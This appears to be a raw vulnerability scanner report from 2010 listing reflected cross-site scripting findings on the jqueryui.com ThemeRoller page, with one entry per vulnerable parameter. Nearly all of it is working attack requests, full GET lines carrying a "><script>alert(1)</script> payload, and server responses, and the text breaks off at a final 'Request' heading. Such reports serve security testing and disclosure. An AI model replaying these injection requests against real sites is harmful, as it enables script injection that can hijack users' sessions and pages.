GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png5f48c"><script>alert(1)</script>be4bd7ca47a&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:32:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120033
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d8aa"><script>alert(1)</script>a079cdcb31f was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png6d8aa"><script>alert(1)</script>a079cdcb31f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:33:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120033
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74af0"><script>alert(1)</script>33f2ea18869 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa74af0"><script>alert(1)</script>33f2ea18869&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:28:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35c1"><script>alert(1)</script>9623c246bab was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0c35c1"><script>alert(1)</script>9623c246bab&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:25:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31115"><script>alert(1)</script>bb5473053cb was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d331115"><script>alert(1)</script>bb5473053cb&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:26:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2637"><script>alert(1)</script>983080c5ba4 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203ee2637"><script>alert(1)</script>983080c5ba4&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:31:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7baa"><script>alert(1)</script>666b39dfef6 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=fffffff7baa"><script>alert(1)</script>666b39dfef6&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:24:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db7f"><script>alert(1)</script>664d66bb6b3 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e09db7f"><script>alert(1)</script>664d66bb6b3&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:29:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aebba"><script>alert(1)</script>f95f6ef0ad9 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999aebba"><script>alert(1)</script>f95f6ef0ad9&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:27:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e303"><script>alert(1)</script>b0e9e9ddf01 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px9e303"><script>alert(1)</script>b0e9e9ddf01&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:24:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e89a"><script>alert(1)</script>6b39fffa270 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px1e89a"><script>alert(1)</script>6b39fffa270 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:34:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ed"><script>alert(1)</script>95358923f11 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121be8ed"><script>alert(1)</script>95358923f11&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:29:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a27a"><script>alert(1)</script>10d27831cca was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=0101019a27a"><script>alert(1)</script>10d27831cca&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:26:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605a3"><script>alert(1)</script>449b4443c2d was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
